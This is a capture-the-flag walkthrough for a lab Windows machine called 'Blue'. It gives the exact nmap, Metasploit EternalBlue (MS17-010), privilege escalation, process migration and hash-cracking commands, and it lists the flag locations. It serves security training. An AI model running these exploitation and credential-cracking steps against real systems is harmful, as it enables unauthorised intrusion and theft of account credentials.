Blue

Deploy & hack into a Windows machine, leveraging common misconfiguration issues.

Scanning

nmap -sV --script vuln $IP

Commands:

-sV – detects the version of each running service

--script vuln – runs the NSE vulnerability-check scripts so we can answer the question

Exploit

I won’t paste the whole output; we are only interested in MS17-010. Now let’s open Metasploit and confirm whether the host is vulnerable:

msfconsole

Now we use the command search to find the module that we want:

search eternal

And we found it; now let’s use it:

use auxiliary/scanner/smb/smb_ms17_010

Now we need to specify the rhost:

set rhost $IP
# to run the module, type:
run

Output:

Sweet, now we can use the EternalBlue exploit module:

# type this to deselect the current module:
back
# now select the new module:
use exploit/windows/smb/ms17_010_eternalblue

Let’s see the options that we need to specify:

options

Let’s specify the rhost and we are good to go:

# target's IP
set rhost $IP
# your own IP (or the interface to listen on):
set lhost tun0
run

And we are in:

Now we can migrate our process into another one running as the user “NT AUTHORITY\SYSTEM”:

First type “getsystem” in the Meterpreter session to elevate our privileges so we are allowed to migrate. Then type:

migrate $numberoftheprocessyouchoose

Now we can dump the hash and crack it. Save the hash you found to a file:

echo "#thehashyoufound" > hash.hash

Now we can use john to crack the hashes:

john hash.hash --wordlist=/usr/share/wordlists/rockyou.txt --format=NT

The flags are located in the following directories:

  • C:\ – flag1

  • C:\Windows\System32\config – flag2

  • C:\Users\Jon\Documents – flag3
